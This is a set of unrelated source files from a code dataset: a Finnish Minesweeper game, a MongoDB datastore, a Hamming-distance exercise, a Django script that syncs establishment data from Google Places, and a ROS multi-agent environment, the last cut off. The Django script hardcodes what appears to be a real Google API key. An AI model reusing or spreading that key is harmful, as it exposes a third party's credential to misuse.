{"seq_id":"613549941","text":"import haravasto\nfrom random import randint\nimport time\n\n\ntila = {\n\t\"kentta\": None,\n\t\"nakyvakentta\": None,\n\t\"liput\": None,\n\t\"miinat\": None,\n\t\"aloitus\": None\n}\n\ndef luo_kentta():\n\t\"\"\"Luo kentän käyttäjän antamien asetusten mukaan\"\"\"\n\tleveys, korkeus, maara = kysy_asetukset()\n\tprint(\"Hiiren vasen aukaisee ruutuja, hiiren oikea asettaa lipun\\nPeli päättyy, kun kaikkien miinojen paikalle on asetettu lippu\")\n\n\tnakyvakentta = []\n\tkentta = []\n\tfor rivi in range(korkeus):\n\t\tkentta.append([])\n\t\tnakyvakentta.append([])\n\t\tfor sarake in range(leveys):\n\t\t\tkentta[-1].append(\" \")\n\t\t\tnakyvakentta[-1].append(\" \")\n\ttila[\"liput\"] = []\n\ttila[\"nakyvakentta\"] = nakyvakentta\n\ttila[\"kentta\"] = kentta\n\tmiinoita(kentta, maara)\n\tnumeroi_ruudut(kentta)\n\ndef kysy_asetukset():\n\t\"\"\"Kysyy käyttäjältä asetukset ja tarkastaa ne\"\"\"\n\tprint(\"Vaikeusasteet ovat Micro$oft Minesweeperin mukaiset ja näin ollen vaikuttavat kentän kokoon, sekä miinojen määrään\\n\")\n\twhile True:\n\t\ttry:\t\n\t\t\tprint(\"Valitse 1. jos haluat pelata helpolla vaikeusasteella\\nValitse 2. jos haluat pelata keskivaikealla vaikeusasteella\\nValitse 3. jos haluat pelata vaikeimmalla vaikeusasteella\")\n\t\t\tprint(\"Valitse 4. 
jos haluat päättää asetukset itse\\n\")\n\t\t\tvalinta = int(input(\"Syötä valintasi: \"))\n\t\t\tif valinta == 1:\n\t\t\t\tleveys = 8\n\t\t\t\tkorkeus = 8\n\t\t\t\tmaara = 10\n\t\t\t\treturn leveys, korkeus, maara\n\t\t\telif valinta == 2:\n\t\t\t\tleveys = 16\n\t\t\t\tkorkeus = 16\n\t\t\t\tmaara = 40\n\t\t\t\treturn leveys, korkeus, maara\n\t\t\telif valinta == 3:\n\t\t\t\tleveys = 24\n\t\t\t\tkorkeus = 24\n\t\t\t\tmaara = 99\n\t\t\t\treturn leveys, korkeus, maara\n\t\t\telif valinta == 4:\n\t\t\t\tleveys = int(input(\"Syötä kentän leveys kokonaislukuna: \"))\n\t\t\t\tkorkeus = int(input(\"Syötä kentän korkeus kokonaislukuna: \"))\n\t\t\t\tmaara = int(input(\"Syötä miinojen lukumäärä: \"))\n\t\t\t\tif leveys < 1 or korkeus < 1 or maara > leveys*korkeus:\n\t\t\t\t\tprint(\"Kenttä on liian pieni tai miinoja on enemmän kuin ruutuja.\\n\")\n\t\t\t\telse:\n\t\t\t\t\treturn leveys, korkeus, maara\n\t\t\telse:\n\t\t\t\tprint(\"Virheellinen valinta.\\n\")\n\t\texcept ValueError:\n\t\t\tprint(\"Syötä arvot kokonaislukuina\\n\")\n\ndef miinoita(kentta, maara):\n\t\"\"\"Asettaa kentällä N kpl miinoja satunnaisiin paikkoihin.\"\"\"\n\tmiinat = []\n\tfor i in range(maara):\n\t\t\tx = randint(0, len(kentta) - 1)\n\t\t\ty = randint(0, len(kentta) - 1)\n\t\t\tif kentta[x][y] != \"x\":\n\t\t\t\tkentta[x][y] = \"x\"\n\t\t\t\tmiinat.append((x, y))\n\t# Asettaa kentän tiedot kirjastoon\n\ttila[\"miinat\"] = miinat\n\ttila[\"kentta\"] = kentta\n\ndef numeroi_ruudut(kentta): \n\t\"\"\"Muuttaa ruutujen arvot vastaamaan viereisten miinojen määrää\"\"\"\n\tfor rivinro, rivi in enumerate(kentta):\n\t\tfor sarakenro, sarake in enumerate(rivi):\n\t\t\tif sarake != \"x\":\n\t\t\t\t# Ottaa naapureiden arvot\n\t\t\t\tarvot = [kentta[r][s] for r, s in etsi_naapurit(rivinro, sarakenro)]\n\t\t\t\t# Laskee kuinka monta on miinoja\n\t\t\t\tif arvot.count(\"x\") > 0:\n\t\t\t\t\tkentta[rivinro][sarakenro] = str(arvot.count(\"x\"))\n\t\t\t\telse:\n\t\t\t\t\tkentta[rivinro][sarakenro] = \"0\"\n\t# Asettaa ruutujen numeroarvot kirjastoon\n\ttila[\"kentta\"] = kentta\n\ndef etsi_naapurit(x, y):\n\t\"\"\"Etsii ruudun naapurit ja palauttaa ne\"\"\"\n\tleveys = len(tila[\"kentta\"])\n\tkorkeus = len(tila[\"kentta\"][0])\n\tnaapurit = []\n\tfor nx in range(min(max(x-1, 0), leveys), min(max(x+2, 0), leveys)):\n\t\tfor ny in range(min(max(y-1, 0), korkeus), min(max(y+2, 0), korkeus)):\n\t\t\t\tnaapurit.append((nx, ny))\n\treturn naapurit\n\ndef tulvataytto(x, y, tarkastettu=[]):\n\t\"\"\"Merkitsee kentällä olevat tuntemattomat alueet turvalliseksi siten, että täyttö aloitetaan annetusta x, y -pisteestä.\"\"\"\n\tnaapurit = etsi_naapurit(x, y)\n\tfor x, y in naapurit:\n\t\tif (x, y) not in tarkastettu:\n\t\t\ttarkastettu.append((x, y))\n\t\t\tif tila[\"kentta\"][x][y] != \"x\" and tila[\"nakyvakentta\"][x][y] != \"f\":\n\t\t\t\ttila[\"nakyvakentta\"][x][y] = tila[\"kentta\"][x][y]\n\n\t\t\tif tila[\"kentta\"][x][y] == \"0\":\n\t\t\t\ttulvataytto(x, y)\n\n\ndef tarkista_voitto(x, y):\n\t#tarkistaa onko liput samoissa paikoissa kuin miinat\n\tif set(tila[\"liput\"]) == set(tila[\"miinat\"]):\n\t\tprint(\"Voitit pelin :)\")\n\t\tprint(\"Aikaa kului: {:.2f} sekunttia\".format(lopeta_kello()))\n\t\tpiirra_kentta()\n\ndef tarkista_havio(x, y):\n\t#tarkistaa onko painetussa kohdassa miina\n\tif tila[\"kentta\"][x][y] == \"x\":\n\t\tprint(\"Hävisit pelin :(\")\n\t\tprint(\"Aikaa kului: {:.2f} sekunttia\".format(lopeta_kello()))\n\t\ttila[\"nakyvakentta\"] = tila[\"kentta\"]\n\t\tpiirra_kentta()\n\ndef avaa_ruutu(x, y):\n\ttarkista_havio(x, 
y)\n\t#jos on lippu, poistaa sen\n\tif (x, y) in tila[\"liput\"]:\n\t\ttila[\"liput\"].remove((x, y))\n\t\t#näytä ruutu\n\t\ttila[\"nakyvakentta\"][x][y] = tila[\"kentta\"][x][y] \n\t\tpiirra_kentta()\n\n\tif tila[\"nakyvakentta\"][x][y] == \" \":\n\t\tif int(tila[\"kentta\"][x][y]) > 0:\n\t\t\ttila[\"nakyvakentta\"][x][y] = tila[\"kentta\"][x][y] \n\t\tif tila[\"kentta\"][x][y] == \"0\":\n\t\t\ttulvataytto(x, y)\n\t\tpiirra_kentta()\n\n\ndef aseta_lippu(x, y):\n\t# Tarkistaa onko ruutu tyhjä\n\tif tila[\"nakyvakentta\"][x][y] == \" \":\n\t\ttila[\"nakyvakentta\"][x][y] = \"f\"\n\t\ttila[\"liput\"].append((x, y))\n\t\ttarkista_voitto(x, y)\n\t# Poistaa lipun\n\telif tila[\"nakyvakentta\"][x][y] == \"f\":\n\t\ttila[\"nakyvakentta\"][x][y] = \" \"\n\t\ttila[\"liput\"].remove((x, y))\n\t\tprint(tila[\"liput\"])\n\telse:\n\t\tprint(\"Ei voi asettaa lippua\")\n\n\tpiirra_kentta()\n\ndef aloita_kello():\n\t# Aloittaa pelin kulkua mittaavan sekunttikellon\n\ttila[\"aloitus\"] = time.time()\n\ndef lopeta_kello():\n\t# Lopettaa pelin kulkua mittaavan sekunttikellon\n\tloppuaika = time.time()\n\ttotal = loppuaika - tila[\"aloitus\"]\n\treturn total\n\ndef hiiri_kasittelija(x, y, nappi, muokkausnapit):\n\t\"\"\"Tätä funktiota kutsutaan kun käyttäjä klikkaa sovellusikkunaa hiirellä.\"\"\"\n\tx = int(x / 40)\n\ty = int(y / 40)\n\tif nappi == haravasto.HIIRI_VASEN:\n\t\tavaa_ruutu(x, y)\n\telif nappi == haravasto.HIIRI_OIKEA:\n\t\taseta_lippu(x, y)\n\ndef piirra_kentta(): \n\t\"\"\"Käsittelijäfunktio, joka piirtää kaksiulotteisena listana kuvatun miinakentän ruudut näkyviin peli-ikkunaan.\n\tFunktiota kutsutaan aina kun pelimoottori pyytää ruudun näkymän päivitystä.\"\"\"\n\tharavasto.tyhjaa_ikkuna()\n\tharavasto.piirra_tausta()\n\tharavasto.aloita_ruutujen_piirto()\n\tfor x in range(len(tila[\"nakyvakentta\"])):\n\t\tfor y in range(len(tila[\"nakyvakentta\"][0])):\n\t\t\t\tharavasto.lisaa_piirrettava_ruutu(tila[\"nakyvakentta\"][x][y], x * 40, y * 40)\n\tharavasto.piirra_ruudut()\n\ndef main():\n\tluo_kentta()\n\tharavasto.lataa_kuvat(\"spritet\")\n\tharavasto.luo_ikkuna(len(tila[\"nakyvakentta\"] * 40), len(tila[\"nakyvakentta\"][0] * 40))\n\tharavasto.aseta_piirto_kasittelija(piirra_kentta)\n\tharavasto.aseta_hiiri_kasittelija(hiiri_kasittelija)\n\taloita_kello()\n\tharavasto.aloita()\nif __name__ == \"__main__\":\n\tmain()","sub_path":"mh.py","file_name":"mh.py","file_ext":"py","file_size_in_byte":6498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"563388154","text":"from aws_xray_sdk.core import xray_recorder\nfrom config import get_mongo_collection\nfrom models.user_stats import UserStats\nfrom fathomapi.utils.exceptions import InvalidSchemaException\n\n\nclass UserStatsDatastore(object):\n    def __init__(self, mongo_collection='athletestats'):\n        self.mongo_collection = mongo_collection\n\n    @xray_recorder.capture('datastore.UserStatsDatastore.get')\n    def get(self, athlete_id):\n        \"\"\"\n        :param athlete_id: uuid\n        :return:\n        \"\"\"\n        return self._query_mongodb(athlete_id)\n\n    def put(self, items):\n        if not isinstance(items, list):\n            items = [items]\n        try:\n            for item in items:\n                self._put_mongodb(item)\n        except Exception as e:\n            raise e\n\n    def delete(self, athlete_id=None):\n        if athlete_id is None:\n            raise InvalidSchemaException(\"Need to provide athlete_id to delete\")\n        self._delete_mongodb(athlete_id=athlete_id)\n\n    @xray_recorder.capture('datastore.UserStatsDatastore._query_mongodb')\n    def _query_mongodb(self, athlete_id):
\n        mongo_collection = get_mongo_collection(self.mongo_collection)\n        if isinstance(athlete_id, list):\n            query = {'athlete_id': {'$in': athlete_id}}\n            mongo_results = mongo_collection.find(query)\n            athlete_stats_list = []\n            for mongo_result in mongo_results:\n                athlete_stats_list.append(UserStats.json_deserialise(mongo_result))\n\n            return athlete_stats_list\n        else:\n            query = {'athlete_id': athlete_id}\n            mongo_result = mongo_collection.find_one(query)\n\n            if mongo_result is not None:\n                return UserStats.json_deserialise(mongo_result)\n            else:\n                return None\n\n    @xray_recorder.capture('datastore.UserStatsDatastore._put_mongodb')\n    def _put_mongodb(self, item):\n        item = item.json_serialise()\n\n        mongo_collection = get_mongo_collection(self.mongo_collection)\n        query = {'athlete_id': item['athlete_id']}\n        mongo_collection.replace_one(query, item, upsert=True)\n\n    @xray_recorder.capture('datastore.UserStatsDatastore._delete_mongodb')\n    def _delete_mongodb(self, athlete_id):\n        mongo_collection = get_mongo_collection(self.mongo_collection)\n        query = {}\n        if isinstance(athlete_id, list):\n            query['athlete_id'] = {'$in': athlete_id}\n        else:\n            query['athlete_id'] = athlete_id\n        if len(query) > 0:\n            mongo_collection.delete_many(query)","sub_path":"apigateway/datastores/user_stats_datastore.py","file_name":"user_stats_datastore.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"330869600","text":"\"\"\"\nThe Hamming distance between two integers is the number of positions at which the corresponding bits are different.\nGiven two integers x and y, calculate the Hamming distance.\n\nNote:\n0 ≤ x, y < 231.\n\nExample:\nInput: x = 1, y = 4\n\nOutput: 2\nExplanation:\n1 (0 0 0 1)\n4 (0 1 0 0)\n ↑ ↑\n\nThe above arrows point to positions where the corresponding bits are different.\n\"\"\"\n\nimport os\nimport sys\n\ndef main():\n    x = 1\n    y = 4\n\n    tmp = 0\n    num1 = 0\n    num2 = 0\n\n    if(0 <= x and y < 2**31):\n        num1 = x ^ y\n        print(\"num1:\",num1)\n        while(num1 != 0):\n            tmp += 1\n            num2 = num1 -1\n            num1 &= num2\n            print(\"tmp:\",tmp,\"num1:\",num1,\"num2:\",num2)\n        print(\"tmp:\",tmp)\n    return tmp\n    \nif __name__ == '__main__':\n    main()\n    ","sub_path":"算法_Python/汉明距离.py","file_name":"汉明距离.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"179836184","text":"#!/usr/bin/python3\n\nimport urllib.request\nimport json\nfrom datetime import time\n\nfrom django.db.models.query import QuerySet\nfrom django.db.models import Q\n\nfrom osg.models import Attraction, Service\nfrom platour.models import Phone, TypeOfPhone, SubtypeOfExternalReference, ExternalReference, OpeningHour\nfrom platour.functions import print_error, print_log, LOG_LEVEL_DEBUG, LOG_LEVEL_INFO, LOG_LEVEL_ERROR, LOG_LEVEL_WARNING\n\ngoogle_place_key = \"AIzaSyC6zYeRdM3nMIhCp3Cy_VadKHBkbsFQkrk\"\nlanguage_pt_br = 'pt-BR'\nregion_br = 'br'\ngoogle_place_url = \"https://maps.googleapis.com/maps/api/place/details/json?placeid={placeid}&key={key}&language={language}&region={region}\"\ngoogle_placeid_search_url = \"https://maps.googleapis.com/maps/api/place/findplacefromtext/json?key={key}&inputtype=textquery&{input}\"\nHTML_HEADER = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'}\nTIMEOUT_REQUEST=60\n\nPHONE_GOOGLE = 'Google'\nWEBSITE_GOOGLE_SUBT = 'Google'\nWEBSITE_GOOGLE_TYPE = 'Site'\n\ndef get_json(placeid, 
language=language_pt_br, region=region_br):\n json_url = google_place_url.format(placeid=placeid, key=google_place_key, language=language, region=region)\n print_log(LOG_LEVEL_DEBUG, \"loading JSON URL '{0}'\".format(json_url))\n try:\n request = urllib.request.Request(json_url, None, HTML_HEADER)\n with urllib.request.urlopen(request, timeout=TIMEOUT_REQUEST) as url:\n data = json.loads(url.read().decode())\n print_log(LOG_LEVEL_DEBUG, \"success loading JSON URL '{0}'\".format(json_url))\n return data\n except:\n print_error(\"failed loading JSON URL '{0}'\".format(json_url))\n return\n\ndef get_placeid(establishment, force_reload=False):\n if type(establishment) not in [Attraction, Service]:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment {0} of type '{1}'\".format(establishment, type(establishment)))\n return None\n\n if force_reload == False:\n placeid = establishment.google_placeid\n if placeid:\n return placeid\n else:\n print_log(LOG_LEVEL_WARNING, \"establishment '{0}' has no google_placeid\".format(establishment))\n\n name = establishment.name\n if not name:\n print_log(LOG_LEVEL_ERROR, \"establishment of id {0} name not found, blank or empty - how is that possible?!\".format(establishment.id))\n return None\n location = establishment.locations.first().name or \"\"\n if not location:\n print_log(LOG_LEVEL_WARNING, \"establishment '{0}' location not found\".format(establishment))\n\n place = \"{0},{1}\".format(name.replace(' ', '+'), location.replace(' ', '+'))\n input_param = urllib.parse.urlencode({'input': place}, 'utf-8')\n json_url = google_placeid_search_url.format(key=google_place_key, input=input_param)\n print_log(LOG_LEVEL_DEBUG, \"loading JSON URL '{0}'\".format(json_url))\n\n try:\n request = urllib.request.Request(json_url, None, HTML_HEADER)\n with urllib.request.urlopen(request, timeout=TIMEOUT_REQUEST) as url:\n data = json.loads(url.read().decode())\n print_log(LOG_LEVEL_DEBUG, \"success loading JSON URL '{0}'\".format(json_url))\n except:\n print_error(\"failed loading JSON URL '{0}'\".format(json_url))\n return None\n\n try:\n candidates = data.get('candidates', None)\n if candidates:\n placeid = candidates[0].get('place_id', None)\n if not placeid:\n print_error(\"failed getting JSON key 'place_id' from URL '{0}'\".format(json_url))\n return None\n print_log(LOG_LEVEL_DEBUG, \"got placeid '{0}' of establishment '{1}'\".format(placeid, establishment))\n return placeid\n except:\n print_error(\"failed getting JSON key 'place_id' from URL '{0}'\".format(json_url))\n return None\n\ndef get_address(json_data):\n return json_data['result'].get('formatted_address', None)\n\ndef get_phone(json_data):\n return json_data['result'].get('international_phone_number', None)\n\ndef get_latitude(json_data):\n return str(json_data['result']['geometry']['location']['lat'])\n\ndef get_longitude(json_data):\n return str(json_data['result']['geometry']['location']['lng'])\n\ndef get_name(json_data):\n return json_data['result'].get('name', None)\n\ndef get_rating(json_data):\n return str(json_data['result'].get('rating', None))\n\ndef get_permanently_closed(json_data):\n try:\n permanently_closed = json_data['result'].get('permanently_closed', None)\n if permanently_closed == 'true':\n return True\n else:\n return False\n except KeyError as e:\n return False\n\ndef get_website(json_data):\n return json_data['result'].get('website', None)\n\ndef get_opening_hours(json_data):\n opening_hours = json_data['result'].get('opening_hours', None)\n if opening_hours:\n return 
opening_hours.get('periods', None)\n else:\n return None\n\ndef update(establishment):\n if establishment == None:\n print_log(LOG_LEVEL_WARNING, \"empty establishment\")\n return\n\n if type(establishment) not in [Attraction, Service]:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment {0} of type '{1}'\".format(establishment, type(establishment)))\n return\n\n print_log(LOG_LEVEL_INFO, \"started updating establishment '{0}'\".format(establishment))\n\n has_change = False\n\n ####################\n # Updating placeid #\n ####################\n data = placeid = get_placeid(establishment)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get a placeid for establishment '{0}'\".format(establishment))\n return\n else:\n data_old = establishment.google_placeid\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new Google placeid: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.google_placeid = data\n has_change = True\n\n ################\n # Getting JSON #\n ################\n e_json = get_json(placeid)\n if e_json == None:\n print_log(LOG_LEVEL_ERROR, \"can't get JSON of establishment '{0}' from Google\".format(establishment))\n return\n elif type(e_json) != dict:\n print_log(LOG_LEVEL_ERROR, \"got unexpected JSON of establishment '{0}' from Google: type: {1} | repr: {2}\".format(establishment, type(e_json), repr(e_json)))\n return\n\n ####################\n # Updating address #\n ####################\n data = get_address(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get address of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.address\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new address: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.address = data\n has_change = True\n\n ##################\n # Updating phone #\n ##################\n data = get_phone(e_json)\n if data == None:\n print_log(LOG_LEVEL_INFO, \"can't get phone of establishment '{0}'\".format(establishment))\n else:\n try:\n gphone = TypeOfPhone.objects.select_related().get(name=PHONE_GOOGLE)\n data_old_set = establishment.phone.select_related().filter(description=gphone)\n data_old = data_old_set.first()\n for d in data_old_set[1:]:\n print_log(LOG_LEVEL_WARNING, \"deleting extra {0} phone '{1}' found in establishment {2}\".format(PHONE_GOOGLE, d, establishment))\n d.delete()\n if not data_old_set:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new {1} phone: from 'None' to '{2}'\".format(establishment, PHONE_GOOGLE, data))\n if type(establishment) == Attraction:\n p = Phone(description=gphone, number=data, attraction=establishment, active=True)\n elif type(establishment) == Service:\n p = Phone(description=gphone, number=data, service=establishment, active=True)\n else:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment '{0}' of type '{1}' - and how did you get here??\".format(establishment, type(establishment)))\n p.save()\n has_change = True\n elif data != data_old.number:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new {1} phone: from '{2}' to '{3}'\".format(establishment, PHONE_GOOGLE, data_old, data))\n data_old.number = data\n data_old.active = True\n data_old.save()\n has_change = True # unnecessary\n except TypeOfPhone.DoesNotExist:\n print_log(LOG_LEVEL_ERROR, \"can't get type of phone '{0}'\".format(PHONE_GOOGLE))\n except:\n print_error()\n\n #####################\n # Updating latitude #\n 
#####################\n data = get_latitude(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get latitude of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.latitude\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new latitude: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.latitude = data\n has_change = True\n\n ######################\n # Updating longitude #\n ######################\n data = get_longitude(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get longitude of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.longitude\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new longitude: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.longitude = data\n has_change = True\n\n #################\n # Updating name #\n #################\n data = get_name(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get name of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.google_name\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new Google name: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.google_name = data\n has_change = True\n\n ###################\n # Updating rating #\n ###################\n data = get_rating(e_json)\n if data == None:\n print_log(LOG_LEVEL_ERROR, \"can't get rating of establishment '{0}'\".format(establishment))\n else:\n data_old = establishment.google_rating\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new rating: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.google_rating = data\n has_change = True\n\n ###################\n # Updating status #\n ###################\n data = not get_permanently_closed(e_json)\n data_old = establishment.active\n if data != data_old:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new status: from '{1}' to '{2}'\".format(establishment, data_old, data))\n establishment.active = data\n has_change = True\n\n ####################\n # Updating website #\n ####################\n data = get_website(e_json)\n if data == None:\n print_log(LOG_LEVEL_INFO, \"can't get website of establishment '{0}'\".format(establishment))\n else:\n try:\n gwebsite = SubtypeOfExternalReference.objects.select_related().get(name=WEBSITE_GOOGLE_SUBT, typeOfExternalReference__name=WEBSITE_GOOGLE_TYPE)\n data_old_set = establishment.external_reference.select_related().filter(subtypeOfExternalReference=gwebsite)\n data_old = data_old_set.first()\n for d in data_old_set[1:]:\n print_log(LOG_LEVEL_WARNING, \"deleting extra {0} external reference '{1}' found in establishment {2}\".format(gwebsite, d, establishment))\n d.delete()\n if not data_old_set:\n print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new {1} external reference: from 'None' to '{2}'\".format(establishment, gwebsite, data))\n if type(establishment) == Attraction:\n e = ExternalReference(subtypeOfExternalReference=gwebsite, url=data, attraction=establishment)\n elif type(establishment) == Service:\n e = ExternalReference(subtypeOfExternalReference=gwebsite, url=data, service=establishment)\n else:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment '{0}' of type '{1}' - and how did you get here??\".format(establishment, type(establishment)))\n e.save()\n has_change = True\n elif data != data_old.url:\n 
print_log(LOG_LEVEL_INFO, \"establishment '{0}' has a new {1} external reference: from '{2}' to '{3}'\".format(establishment, gwebsite, data_old, data))\n data_old.url = data\n data_old.save()\n except SubtypeOfExternalReference.DoesNotExist:\n print_log(LOG_LEVEL_ERROR, \"can't get subtype of external reference '{0}' of type '{1}'\".format(WEBSITE_GOOGLE_SUBT, WEBSITE_GOOGLE_TYPE))\n except:\n print_error()\n\n ###########################\n # Updating opening hours #\n ###########################\n data_json = get_opening_hours(e_json)\n if data_json == None:\n print_log(LOG_LEVEL_INFO, \"can't get opening hour of establishment '{0}'\".format(establishment))\n else:\n try:\n if type(establishment) == Attraction:\n OpeningHour.objects.select_related().filter(attraction=establishment).delete()\n elif type(establishment) == Service:\n OpeningHour.objects.select_related().filter(service=establishment).delete()\n else:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment '{0}' of type '{1}' - and how did you get here??\".format(establishment, type(establishment)))\n print(data_json)\n for ow in data_json:\n try:\n day = ow['open']['day']\n opensAt_str = ow['open']['time']\n close = ow.get('close', None)\n closesAt_str = close['time'] if close != None else None\n except KeyError:\n print_log(LOG_LEVEL_ERROR, \"wrong format on opening hour of establishment {0}\".format(establishment))\n continue\n except:\n print_error()\n opensAt = time(int(opensAt_str[:2]), int(opensAt_str[2:]))\n closesAt = time(int(closesAt_str[:2]), int(closesAt_str[2:])) if closesAt_str else None\n if type(establishment) == Attraction:\n ow_obj = OpeningHour(attraction=establishment, day=day, opensAt=opensAt, closesAt=closesAt)\n else:\n ow_obj = OpeningHour(service=establishment, day=day, opensAt=opensAt, closesAt=closesAt)\n ow_obj.save()\n print_log(LOG_LEVEL_INFO, \"got opening hour for establishment '{0}': {1}\".format(establishment, ow_obj))\n except:\n print_error()\n\n if has_change == True:\n print_log(LOG_LEVEL_INFO, \"saving change(s) on establishment '{0}': started\".format(establishment))\n establishment.save()\n print_log(LOG_LEVEL_INFO, \"saving change(s) on establishment '{0}': finished\".format(establishment))\n else:\n print_log(LOG_LEVEL_INFO, \"none changes found on establishment '{0}'\".format(establishment))\n\ndef run(establishments):\n if type(establishments) != QuerySet:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment QuerySet {0} of type '{1}'\".format(establishments, type(establishments)))\n return None\n\n if establishments.model not in [Attraction, Service]:\n print_log(LOG_LEVEL_ERROR, \"unexpected establishment model of type '{0}'\".format(establishments.model))\n return None\n\n for e in establishments:\n try:\n update(e)\n except:\n print_error()\n\ndef main():\n establishments = Attraction.objects.select_related().all()\n run(establishments)\n establishments = Service.objects.select_related().all()\n run(establishments)\n\nif __name__ == '__main__':\n main()\n ","sub_path":"osg/establishment_update.py","file_name":"establishment_update.py","file_ext":"py","file_size_in_byte":15239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"373554017","text":"import rospy\nimport numpy as np\nimport random\nfrom std_srvs.srv import Empty\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom gazebo_connection import GazeboConnection\nfrom tf.transformations import 
\n\n'''\n---------------------------------------------------------------------------------------------------\nAdapted and simplified from OpenAI's Multiagent Particle Environment class for use with a ROS\nGazebo world with a discrete action space. Continuous action space has not been implemented.\nSteps through the Gazebo simulation, gathering observations and assigning actions and rewards\nfor each agent at each time step.\n\nAuthor: Joseph Pickens, August Soderberg\n---------------------------------------------------------------------------------------------------\n'''\nclass MultiAgentGazeboEnv():\n    def __init__(self, num_agents, reset_callback=None, reward_callback=None,\n                 observation_callback=None, info_callback=None, done_callback=None):\n        # scenario callbacks\n        self.reset_callback = reset_callback\n        self.reward_callback = reward_callback\n        self.observation_callback = observation_callback\n        self.info_callback = info_callback\n        self.done_callback = done_callback\n\n        self.num_agents = num_agents\n        self.vel_pubs = []\n        for i in range(self.num_agents):\n            # robot namespaces are assumed to be 'robot1', 'robot2', ...\n            self.vel_pubs.append(rospy.Publisher('/robot%d/cmd_vel' % (i+1), Twist, queue_size=1))\n\n        # TODO: speed definition should be specific to the scenario from which callbacks are\n        # defined, rather than be defined here in the general multiagent environment class.\n        self.linear_speed = 2.0\n        self.angular_speed = 2.0\n\n        self.gazebo = GazeboConnection(False, 'WORLD')\n\n    def step(self, action_n):\n        obs_n = []\n        reward_n = []\n        done_n = []\n        info_n = {'n': []}\n\n        self.gazebo.unpause_sim()\n        for i, action in enumerate(action_n):\n            self._set_action(action, i)\n        self.gazebo.pause_sim()\n\n        # record observation, etc. for each agent\n        for i, _ in enumerate(action_n):\n            obs_n.append(self._get_obs(i))\n            reward_n.append(self._get_reward(i))\n            done_n.append(self._get_done(i))\n            info_n['n'].append(self._get_info(i))\n\n        return obs_n, reward_n, done_n, info_n\n\n    def reset(self):\n        # Resets the state of the environment and returns an initial observation.\n        for i in range(self.num_agents):\n            model_name = 'Robot%d' % (i + 1)\n            x = random.uniform(-1.2, 1.2)\n            y = random.uniform(-1.2, 1.2)\n            z = 0.35\n            q = quaternion_from_euler(0, 0, random.uniform(0, 6.28))\n            pose = [x, y, z]\n            pose.extend(q)\n            self.gazebo.set_model_state(model_name, pose)\n        self.gazebo.unpause_sim()\n        self.gazebo.pause_sim()\n        obs_n = []\n        for i in range(self.num_agents):\n            obs_n.append(self._get_obs(i))\n        return obs_n\n\n    # get info used for benchmarking\n    def _get_info(self, agent):\n        if self.info_callback is None:\n            return {}\n        return self.info_callback(agent)\n\n    # get observation for a particular agent\n    def _get_obs(self, agent):\n        if self.observation_callback is None:\n            return np.zeros(0)\n        return self.observation_callback(agent)\n\n    # get dones for a particular agent\n    def _get_done(self, agent):\n        if self.done_callback is None:\n            return False\n        return self.done_callback(agent)\n\n    # get reward for a particular agent\n    def _get_reward(self, agent):\n        if self.reward_callback is None:\n            return 0.0\n        return self.reward_callback(agent)\n\n    # set env discrete action for a particular agent\n    # action must be a list of 4 binary variables: [forward, backward, left, right]\n    def _set_action(self, action, agent):\n        t = Twist()\n        t.linear.x = (action[0] - action[1]) * self.linear_speed\n        t.angular.z = (action[2] - action[3]) * self.angular_speed\n        
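        # Worked example (added illustration): with linear_speed = angular_speed = 2.0,
        # the discrete action [1, 0, 0, 1] (forward + right) gives
        #   t.linear.x  = (1 - 0) * 2.0 =  2.0
        #   t.angular.z = (0 - 1) * 2.0 = -2.0
        # i.e. the robot drives forward while turning clockwise.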
